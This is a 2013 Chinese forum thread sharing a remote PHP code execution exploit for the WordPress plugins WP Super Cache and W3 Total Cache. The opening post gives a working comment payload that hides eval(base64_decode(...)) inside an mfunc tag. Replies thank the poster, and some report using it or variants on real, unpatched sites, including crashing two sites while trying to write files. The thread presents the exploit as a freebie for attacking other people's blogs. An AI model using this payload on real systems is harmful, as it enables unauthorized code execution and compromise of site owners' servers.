为什么没人发这个？Wordpress W3 Total Cache PHP Code Execution

2013-05-03 04:03:29 27 y35u 4469

针对以下两个插件都有效
WP Super Cache (version 1.2 and below, version 1.3.x and up are OK)

W3 Total Cache (version 0.9.2.8 and below, version 0.9.2.9 is OK)

在任意帖子处评论

<!--mfunc eval(base64_decode(cGhwaW5mbygpOyAg)); --><!--/mfunc-->

就执行了php，phpinfo（）;

类别 Web安全

关于作者

y35u166篇文章1147篇回复

wechat:13045558888

y35u

评论27次

要评论？请先登录或注册

27楼

dm-xy
2020-7-7 14:30

WordPress 插件洞可以的

回复|@ta|踩(0)|顶(0)
26楼

jkrow
2013-5-9 17:44

fputs搞挂两个站，直接phoinfo没事，写post不知写在哪去了，没连上，郁闷，最终是写进哪个文件里的啊，看phpinfo的回显像是index.php里

回复|@ta|踩(0)|顶(0)
25楼

147111
2013-5-5 19:59

终于遇到一个WP的

回复|@ta|踩(0)|顶(0)
24楼

clannad
2013-5-5 19:20

楼主发掘漏洞能力的确不错~

回复|@ta|踩(0)|顶(0)
23楼

yantou
2013-5-4 11:23

WP的爆的比较多的都是插件漏洞么?

回复|@ta|踩(0)|顶(0)
22楼

suniteboy
2013-5-3 22:31

这个主机商有提示

回复|@ta|踩(0)|顶(0)
21楼

不是我干的
2013-5-3 20:53

这个好啊。才知道

回复|@ta|踩(0)|顶(0)
20楼

icerain
2013-5-3 19:05

刚刚在那个论坛看到了

回复|@ta|踩(0)|顶(0)
19楼

ptvip
2013-5-3 17:50

用这两个插件的人多么？

回复|@ta|踩(0)|顶(0)
18楼

zouxiangshennan
2013-5-3 16:54

福利鉴定完毕

回复|@ta|踩(0)|顶(0)
17楼

guhun
2013-5-3 16:08

又是插件惹的祸.

回复|@ta|踩(0)|顶(0)
16楼

web安全测试
2013-5-3 15:48

wp的好东西

回复|@ta|踩(0)|顶(0)
15楼

wepeng
2013-5-3 13:23

人品果然好呀！

回复|@ta|踩(0)|顶(0)
14楼

imspider
2013-5-3 13:01

这个！在exploit-db上看过，还有个phpmyadmin的远程代码执行。

回复|@ta|踩(0)|顶(0)
13楼

milkdevil
2013-5-3 12:18

这个不错~收下福利了

回复|@ta|踩(0)|顶(0)
12楼

壞壞不乖
2013-5-3 12:18

收藏了，谢谢LZ····

回复|@ta|踩(0)|顶(0)
11楼

jaly
2013-5-3 11:31

应该不少牛的博客都用了这插件的

回复|@ta|踩(0)|顶(0)
10楼

大胆
2013-5-3 11:26

万恶的评论审核。

回复|@ta|踩(0)|顶(0)
9楼

Rices
2013-5-3 11:23

国内的好像很多都没升级, 昨天测试了一个成功~

回复|@ta|踩(0)|顶(0)
8楼

dgrzh
2013-5-3 10:53

好东西啊，多谢分享

回复|@ta|踩(0)|顶(0)